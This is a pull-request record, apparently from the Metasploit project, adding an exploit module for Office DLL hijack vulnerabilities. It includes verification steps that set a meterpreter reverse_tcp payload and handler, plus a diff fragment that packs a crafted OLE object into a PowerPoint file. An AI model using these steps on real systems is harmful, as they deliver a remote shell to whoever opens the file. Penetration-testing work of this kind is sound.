### PR TITLE
Add exploit module for Office DLL Hijack / MS15-132, MS16-014, MS16-025, MS16-041, MS16-070

### PR DESCRIPTION
**Pull request by ykoster**
Exploit module for multiple DLL hijack vulnerabilities in Office / Windows. This module contains an embedded PPTX, maybe it should be fetched from somewhere else.
## Verification
- [x] Start `msfconsole`
- [x] `use exploit/windows/fileformat/office_ole_multiple_dll_hijack`
- [x] `set PAYLOAD windows/meterpreter/reverse_tcp`
- [x] `set LHOST x.x.x.x`
- [x] `exploit`
- [x] Copy files from .msf5/local/ to share or Windows machine
- [x] `use exploit/multi/handler`
- [x] `set PAYLOAD windows/meterpreter/reverse_tcp`
- [x] `set LHOST x.x.x.x`
- [x] `run`
- [x] Open pptx on target system

### CODE REVIEW

**Comment by scriptjunkie** [comment]
Please move the exploit file into data/exploits/ rather than base64-decoding it in the module itself. You can see a lot of other examples in there and in the associated modules.

File: modules/exploits/windows/fileformat/office_ole_multiple_dll_hijack.rb [hunk 1]
```diff
@@ -0,0 +1,928 @@
...
+|)
+    ppsx = Rex::Zip::Archive.new
+
+    Zip::InputStream.open(StringIO.new(data)) do |zis|
+      while entry = zis.get_next_entry
+        ppsx.add_file(entry.name, zis.read)
+      end
+    end
+
+    ppsx.add_file('/ppt/embeddings/oleObject1.bin', create_ole(clsid))
```
Comment (nixawk) [inline modules/exploits/windows/fileformat/office_ole_multiple_dll_hijack.rb]: Instable path

**Comment by scriptjunkie** [comment]
Verified it works. Excellent module, thank you!

**Comment by tdoan-r7** [comment]
# Release Notes

An exploit module for multiple DLL hijack vulnerabilities in Office/Windows has been added. This module contains an embedded PPTX.

**Pull request merged**